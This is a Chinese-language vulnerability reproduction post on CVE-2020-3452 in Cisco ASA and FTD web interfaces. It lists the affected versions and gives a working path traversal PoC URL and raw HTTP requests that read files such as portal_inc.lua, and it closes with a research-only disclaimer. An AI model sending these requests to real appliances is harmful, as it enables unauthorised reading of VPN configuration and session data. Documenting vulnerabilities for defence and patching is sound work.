当前位置: 代码迷 >> 综合 >> CISCO ASA任意文件读取漏洞复现 (CVE-2020-3452)
  详细解决方案

CISCO ASA任意文件读取漏洞复现 (CVE-2020-3452)

热度:20   发布时间:2023-11-20 05:16:44.0

在这里插入图片描述

CISCO ASA任意文件读取漏洞复现 (CVE-2020-3452)

一、漏洞描述:

Cisco Adaptive Security Appliance (ASA)
防火墙设备以及Cisco Firepower Threat Defense (FTD)设备的web管理界面存在未授权的目录穿越漏洞和远程任意文件读取漏洞。攻击者只能查看web目录下的文件,无法通过该漏洞访问web目录之外的文件。该漏洞可以查看webVpn设备的配置信息,cookies等。

二、影响范围

以下是CVE-2020-3452漏洞受影响的系统版本:

Cisco ASA 设备影响版本:

<9.6.1

9.6 < 9.6.4.42

9.71

9.8 < 9.8.4.20

9.9 < 9.9.2.74

9.10 < 9.10.1.42

9.12 < 9.12.3.12

9.13 < 9.13.1.10

9.14 < 9.14.1.10

Cisco FTD设备影响版本:

6.2.2

6.2.3 < 6.2.3.16

6.3.0 < Migrate to 6.4.0.9 + Hot Fix or to 6.6.0.1

6.4.0 < 6.4.0.9 + Hot Fix

6.5.0 < Migrate to 6.6.0.1 or 6.5.0.4 + Hot Fix (August 2020)

6.6.0 < 6.6.0.1

三、漏洞复现

POC:

/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../

在这里插入图片描述
在这里插入图片描述

详细数据包

GET/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../HTTP/1.1
Host: 127.0.0.1
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3494.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.9
Cookie: webvpnlogin=1; webvpnLang=en

在这里插入图片描述

GET/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../HTTP/1.1
Host: 127.0.0.1
Content-Length: 2

核心的路径访问就OK

直接访问就是下载对应访问的文件:
在这里插入图片描述

参考:

https://mp.weixin.qq.com/s/zm0NXfBQLbqU0kZ9Uk7qLQ

https://www.cnblogs.com/potatsoSec/p/13364171.html

https://www.venustech.com.cn/article/1/14597.html

免责声明:本站提供安全工具、程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

订阅查看更多复现文章、学习笔记

thelostworld

安全路上,与你并肩前行!!!!

在这里插入图片描述

个人知乎:https://www.zhihu.com/people/fu-wei-43-69/columns

个人简书:https://www.jianshu.com/u/bf0e38a8d400

个人CSDN:https://blog.csdn.net/qq_37602797/category_10169006.html

原文连接:https://mp.weixin.qq.com/s/i_x7gx_VratC6t8PaCg-Kg?